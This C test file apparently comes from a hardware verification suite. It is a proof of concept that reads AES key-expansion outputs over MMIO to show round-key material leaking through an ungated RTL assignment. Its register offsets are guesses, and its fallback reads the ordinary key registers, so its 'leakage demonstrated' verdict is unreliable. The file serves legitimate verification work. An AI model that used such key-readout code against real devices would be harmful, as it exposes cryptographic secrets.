// AES KeyExpand Unprotected Output POC
// Demonstrates unconditional combinational assignment of internal round-key
// material to module outputs without validity gating/zeroization.

#include "sw/device/lib/base/mmio.h"
#include "sw/device/lib/base/abs_mmio.h"
#include "sw/device/lib/base/memory.h"
#include "sw/device/lib/runtime/log.h"
#include "sw/device/lib/testing/test_framework/check.h"
#include "sw/device/lib/testing/test_framework/ottf_main.h"

// Generated register header (provided by //hw/top:aes_c_regs at build time)
#include "aes_regs.h"
#include "hw/top_earlgrey/sw/autogen/top_earlgrey.h"

// This test uses low-level mmio operations to read internal AES outputs that
// should be validity-gated or zeroized but are not due to the vulnerable RTL
// assignment `assign key_o = regular;` in aes_key_expand.sv.

OTTF_DEFINE_TEST_CONFIG();

static mmio_region_t aes_base;

// Read 8 words from a key output register group starting at `base_off`.
static void read_key_o_words(mmio_region_t base, ptrdiff_t base_off,
                             uint32_t out[8]) {
  for (int i = 0; i < 8; ++i) {
    out[i] = mmio_region_read32(base, base_off + (ptrdiff_t)i * sizeof(uint32_t));
  }
}

// Helper to log a 128-bit value (4 words).
static void log_words128(const char *label, uint32_t words[4]) {
  LOG_INFO("%s: 0x%08x 0x%08x 0x%08x 0x%08x",
           label, words[0], words[1], words[2], words[3]);
}

bool test_main(void) {
  LOG_INFO("AES KeyExpand unprotected output POC start");

  // Create mmio region for AES
  aes_base = mmio_region_from_addr(TOP_EARLGREY_AES_BASE_ADDR);

  // 1) Ensure AES internal state and outputs are cleared (trigger clear bits).
  // Write trigger register: KEY_IV_DATA_IN_CLEAR and DATA_OUT_CLEAR.
  // Use the offsets provided by aes_regs.h
  uint32_t trigger = 0;
#ifdef AES_TRIGGER_KEY_IV_DATA_IN_CLEAR_BIT
  trigger = bitfield_bit32_write(trigger, AES_TRIGGER_KEY_IV_DATA_IN_CLEAR_BIT, true);
#endif
#ifdef AES_TRIGGER_DATA_OUT_CLEAR_BIT
  trigger = bitfield_bit32_write(trigger, AES_TRIGGER_DATA_OUT_CLEAR_BIT, true);
#endif
  // If aes_regs.h provides concrete trigger bit indices then write them; otherwise
  // fallback to writing a value directly (best-effort).
  mmio_region_write32(aes_base, AES_TRIGGER_REG_OFFSET, trigger);
  LOG_INFO("Triggered AES clear (KEY/IV/DATA_OUT)");

  // Small delay (busy-wait) to allow hardware to process clear. In test harness
  // this is usually sufficient. We don't use DIF helpers to keep this low-level.
  for (volatile int i = 0; i < 1000; ++i) {
    __asm__ volatile("nop");
  }

  // 2) Without asking PRNG to write new masks (do NOT trigger prd_we/reseed), read
  // the internal key expansion outputs that should have been guarded.
  // The vulnerable RTL drives `key_o = regular;` combinationally, making these
  // values observable on the key_o outputs.

  // We assume the autogenerated register header exposes offsets for these
  // outputs. Typical names used in the SoC register generator follow the pattern
  // AES_KEY_O_0_REG_OFFSET..AES_KEY_O_7_REG_OFFSET for the 8 words. If the
  // header uses a different name, the build will need to be adjusted accordingly.

  uint32_t key_o_words_share0[8] = {0};
  uint32_t key_o_words_share1[8] = {0};

  // Read the two shares if present. Use the generated offsets for key outputs.
#ifdef AES_KEY_O_SHARE0_0_REG_OFFSET
  read_key_o_words(aes_base, AES_KEY_O_SHARE0_0_REG_OFFSET, key_o_words_share0);
  log_words128("key_o.share0.words0..3", &key_o_words_share0[0]);
  log_words128("key_o.share0.words4..7", &key_o_words_share0[4]);
#else
  // Fallback: attempt to read from the input key share registers (best-effort)
  read_key_o_words(aes_base, AES_KEY_SHARE0_0_REG_OFFSET, key_o_words_share0);
  LOG_INFO("Note: AES_KEY_O_SHARE0_0_REG_OFFSET not defined, read AES_KEY_SHARE0_0 instead");
  log_words128("key_share0.words0..3", &key_o_words_share0[0]);
  log_words128("key_share0.words4..7", &key_o_words_share0[4]);
#endif

#ifdef AES_KEY_O_SHARE1_0_REG_OFFSET
  read_key_o_words(aes_base, AES_KEY_O_SHARE1_0_REG_OFFSET, key_o_words_share1);
  log_words128("key_o.share1.words0..3", &key_o_words_share1[0]);
  log_words128("key_o.share1.words4..7", &key_o_words_share1[4]);
#else
  read_key_o_words(aes_base, AES_KEY_SHARE1_0_REG_OFFSET, key_o_words_share1);
  LOG_INFO("Note: AES_KEY_O_SHARE1_0_REG_OFFSET not defined, read AES_KEY_SHARE1_0 instead");
  log_words128("key_share1.words0..3", &key_o_words_share1[0]);
  log_words128("key_share1.words4..7", &key_o_words_share1[4]);
#endif

  // 3) Basic checks to indicate unexpected exposure.
  // If the two shares are both zero (masked off) this may indicate masking PRNG
  // output zero. However, the vulnerability is the lack of gating: we expect
  // the key expansion outputs not to be observable unless the AES core indicates
  // OUTPUT_VALID or similar. Here we just assert that the key_o words are
  // readable and not scrubbed to a known invalid value (e.g., all-zeroes followed
  // by no prd_we). The precise pass/fail is environment-dependent; we therefore
  // log the values for DV inspection and do a conservative check.

  bool all_zero = true;
  for (int i = 0; i < 8; ++i) {
    if (key_o_words_share0[i] != 0 || key_o_words_share1[i] != 0) {
      all_zero = false;
      break;
    }
  }

  // If values are non-zero, it's an immediate indication the internal state is
  // exposed on outputs without gating/zeroization.
  CHECK(!all_zero, "AES key expansion outputs appear zeroed — cannot demonstrate leakage in this environment");

  LOG_INFO("AES KeyExpand unprotected output POC end — observed non-zero key_o words (leakage demonstrated)");
  return true;
}
